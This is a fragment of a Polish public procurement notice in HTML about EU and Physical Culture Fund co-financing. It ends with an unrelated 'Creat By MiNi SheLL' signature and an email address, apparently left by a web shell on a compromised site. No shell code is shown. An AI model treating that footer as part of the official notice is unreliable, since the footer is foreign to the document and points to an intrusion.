4)Projekt jest współfinansowany w ramach Regionalnego Programu Operacyjnego dla Województwa Pomorskiego na lata 2007 - 2013 oraz ze środków Funduszu Rozwoju Kultury Fizycznej.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com